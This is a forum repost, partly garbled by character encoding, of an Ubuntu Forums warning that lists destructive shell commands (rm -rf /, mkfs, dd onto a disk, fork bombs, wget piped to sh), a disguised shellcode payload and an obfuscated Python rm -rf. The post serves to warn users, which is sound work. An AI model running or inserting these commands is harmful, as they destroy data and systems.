| ²é¿´: 700 | »Ø¸´: 1 | |||
| µ±Ç°Ö÷ÌâÒѾ´æµµ¡£ | |||
dnpÈÙÓþ°æÖ÷ (ÖªÃû×÷¼Ò)
Сľ³æÀË×Ó
|
[½»Á÷]
[תÌù]Çë²»ÒªÖ´ÐÐÈçÏÂÀàËÆÃüÁî--UbuntuΣÏÕÃüÁî
|
||
|
×î½üubuntu¹Ù·½ÂÛ̳·¢³öÁ˹ٷ½Í¨¸æ, ÁгöÏÂÁÐΣÏÕÃüÁî, ¸æ½ëÓû§²»ÒªÖ´ÐÐ, ²¢¶ÔËæÒâÕÅÌùÏÂÁÐÃüÁîµÄÕʺŴ¦ÒÔÖ±½Ó·âºÅµÄ´¦·£. ÔÙ´ÎÉùÃ÷, Çë²»ÒªÖ´ÐÐÏÂÁлòÀàËÆÏÂÁеÄÃüÁî, ÕâЩÃüÁ»á¶ÔÄãµÄ¼ÆËã»úÔì³ÉÑÏÖØÓ°Ïì. Çë²»ÒªÒÔʲô¸øÆÕͨÓû§½ÌѵÀ´Ìá¸ßËûÃǵݲȫÒâʶµÈµÈÍдÊÀ´Îª×Ô¼º²»»³ºÃÒâµÄÐÐΪ×÷Ϊ½è¿Ú! http://ubuntuforums.org/announcement.php?a=54 Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute. ÏÂÁÐÃüÁî»áɾ³ýËùÓÐÎļþ, ɾ³ýµ±Ç°Ä¿Â¼, ɾ³ýµ±Ç°Ä¿Â¼ÏÂÃæµÄÎļþ. ´úÂë: rm -rf / rm -rf . rm -rf * Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem. ÏÂÁÐÃüÁî»á´Ý»ÙÕû¸öÎļþϵͳ, ÖØ½¨·ÖÇø. ´úÂë: mkfs mkfs.ext3 mkfs.anything Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data: ÏÂÁÐÃüÁî»áÇå¿ÕÕû¸öÓ²ÅÌ. ´úÂë: any_command > /dev/sda dd if=something of=/dev/sda Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates. In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiousity provokes) ÏÂÁÐÃüÁî»áÆô¶¯´óÁ¿½ø³Ì, µ¼ÖÂϵͳÎÞ·¨ÏìÓ¦, Ö»ÄÜÓ²ÖØÆô»úÆ÷, ¿ÉÄܻᵼÖÂÊý¾ÝËðº¦. ´úÂë: ){:|:&};:In Perl ´úÂë: fork while fork Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GB's, filling your hard drive. You should not touch data from an untrusted source Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust ²»ÒªÖ´ÐÐÄã²»ÐÅÈεÄÈËÌṩµÄshell½Å±¾, ÀïÃæ¿ÉÄܺ¬ÓÐΣÏÕµÄÃüÁîºÍ½Å±¾, ²»ÒªËæÒâ½âѹ±ðÈËÌṩµÄѹËõ°ü, Ò²Ðí¿´ÆðÀ´ºÜС, ½á¹û½âѹ³öÀ´»áÈûÂúÕû¸öÓ²ÅÌ. ´úÂë: wget http://some_place/some_file sh ./some_file ´úÂë: wget http://some_place/some_file -O- | sh Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address). A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload: ²»Òª±àÒëÔËÐбðÈËÌṩµÄ²»Ã÷´úÂë ´úÂë: char esp[] __attribute__ ((section(".text" )) /* e.s.prelease */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31" "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x2d\x63\x00" "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;"; To the new or even lightly experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms -- watch out. Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not! For example, 30 seconds in Python yields something like this: ´úÂë: python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))' Where "sn!.sg!+" is simply rm -rf * shifted a character up. Of course this is a silly example -- I wouldn't expect anyone to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong. |
» ²ÂÄãϲ»¶
2026ÄêµÚÎå½ìµçÆø¡¢µç×ÓÓëÐÅÏ¢¹¤³Ì¹ú¼Ê»áÒ飨ISEEIE 2026£©
ÒѾÓÐ0È˻ظ´
¹þ¶û±õÀí¹¤´óѧÎïÀíϵÕÐÊÕÎïÀíѧ¿¼Ñе÷¼Á
ÒѾÓÐ6È˻ظ´
ÎïÀíѧIÂÛÎÄÈóÉ«/·ÒëÔõôÊÕ·Ñ?
ÒѾÓÐ277È˻ظ´
0702Ò»Ö¾Ô¸¼ª´óBÇøÇóµ÷¼Á
ÒѾÓÐ5È˻ظ´
Çóµ÷¼Á
ÒѾÓÐ0È˻ظ´
0702Ò»Ö¾Ô¸¼ª´óBÇøÇóµ÷¼ÁÓÐÂÛÎÄ
ÒѾÓÐ0È˻ظ´
ÇëÎÊ»¹ÓÐûÓÐÓÃLatexдÎÄÕµÄС»ï°éÃÇ£¿
ÒѾÓÐ0È˻ظ´
¹âѧ¹¤³Ìѧ˶µ÷¼ÁÐÅÏ¢
ÒѾÓÐ30È˻ظ´
»¶Ó¼ÓÈë¿ÎÌâ×é
ÒѾÓÐ0È˻ظ´
É¢½ð±Ò£¬ÇóºÃÔË£¬×£ÃæÉÏ˳Àû£¡
ÒѾÓÐ64È˻ظ´
»ª¶«Ê¦·¶´óѧоƬÉè¼ÆÐìççÕæÊµË®Æ½Õ¦Ñù
ÒѾÓÐ1È˻ظ´

dnp
ÈÙÓþ°æÖ÷ (ÖªÃû×÷¼Ò)
Сľ³æÀË×Ó
- Ó¦Öú: 74 (³õÖÐÉú)
- ¹ó±ö: 18.476
- ½ð±Ò: 18835.9
- É¢½ð: 2040
- ºì»¨: 77
- ɳ·¢: 6
- Ìû×Ó: 7318
- ÔÚÏß: 598.1Сʱ
- ³æºÅ: 437184
- ×¢²á: 2007-08-26
- ÐÔ±ð: GG
- רҵ: ÉúÎïÐÅϢѧ
- ¹ÜϽ: Óлú½»Á÷

2Â¥2007-12-12 21:52:48













){:|:&};:
)) /* e.s.p
»Ø¸´´ËÂ¥